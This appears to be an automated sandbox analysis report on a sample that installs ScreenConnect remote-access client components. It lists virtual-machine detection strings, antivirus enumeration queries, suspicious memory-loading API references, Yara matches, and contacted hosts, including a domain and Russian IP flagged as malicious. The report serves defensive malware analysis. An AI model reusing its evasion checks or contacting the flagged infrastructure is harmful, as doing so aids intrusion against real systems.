Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2405331292.000002217042B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000004.00000002.2407570348.00000227B7827000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2413049971.00000227B8E69000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFF0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.2404460863.000002217040B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2407525579.0000022170502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.2406431788.0000022170485000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b
Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Source: ScreenConnect.ClientService.dll.14.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Source: Yara match	File source: 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 7692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, type: DROPPED

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
37.221.67.19	cp3back96.site	Russian Federation	48430	FIRSTDC-ASRU	true

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
www.google.com	142.250.185.228	true
cp3back96.site	37.221.67.19	true
cp9856.chelokipotlester.icu	37.221.67.19	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true

ID:	1544862
Product:	CloudBasic
Start time:	19:33:35
Start date:	29.10.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS